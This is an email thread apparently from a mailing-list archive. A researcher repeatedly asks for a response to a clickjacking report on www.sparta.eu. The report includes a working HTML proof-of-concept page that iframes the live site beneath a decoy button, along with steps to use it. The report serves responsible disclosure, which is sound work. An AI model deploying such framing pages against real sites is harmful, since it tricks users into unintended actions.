5 Apr
2022
5 Apr
'22
11:26 a.m.
Hello Team,
Please give me response on this issue
On Tue, Mar 1, 2022 at 9:26 PM Sakshi Patil <sakshipatil017(a)gmail.com>
wrote:
sir any update?
On Sun, Nov 22, 2020 at 8:16 PM Sakshi Patil <sakshipatil017(a)gmail.com>
wrote:
*Vulnerability Name : Click jacking*
Target URL:https://www.sparta.eu/
Vulnerability Description :
Click jacking (User Interface redress attack, UI redress attack, UI
redressing) is a malicious technique of tricking a Web user into clicking
on something different from what the user perceives they are clicking on,
thus potentially revealing confidential information or taking control of
their computer while clicking on seemingly innocuous web pages.
The server didn't return an X-Frame-Options header which means that this
website could be at risk of a click jacking attack. The X-Frame-Options
HTTP response header can be used to indicate whether or not a browser
should be allowed to render a page in a <frame> or <iframe>. Sites can use
this to avoid click jacking attacks, by ensuring that their content is not
embedded into other sites.
Typically there is one type of attack - cross site request forgeries
(CSRF) that can interact with functions on other websites.
1) This vulnerability affects Web Server.
<html>
<head>
<title>Clickjack test page</title>
</head>
<style>
#myBtn{
z-index: 999;
position: absolute;
top: 100px;
right: 50px;
color: white;
background-color: red;
}
</style>
<body>
<!-- <h1> A Sample Test Page </h1>
<p>Website is vulnerable to click jacking! </p>
<p>Avoid random clicks </p> -->
<div style="z-index:-9999; position:absolute;top:0; left:0;width: 70%;
height:70%">
<iframe src="https://www.sparta.eu/
"frame1" width="100%"
height="100%" >
</iframe></div>
<div align="right" style="position:absolute; top:1; left:0; z-index:1;
width: 70%;height:60%; text-align:left;">
<a href="https://www.sparta.eu/
"target="_blank"><button id="myBtn"> click
here</button></a>
<!-- <a href="https://www.sparta.eu/
"><button id="myBtn">Open Modal</button></a> -->
<div id="myModal" class="modal">
<!-- Modal content -->
</div>
</body>
</html>
2.save it as <any name>.html eg s.html
3.and just simply open that..and click on button(direct login) its
redirect https://www.sparta.eu/
As far as i know this data is enough to prove that your site is
vulnerable to Click jacking.
Impact:
Attacker may tricked user, sending them malicious link then user open it
clicked some image and their account unconsciously has been deactivated .
Attachment: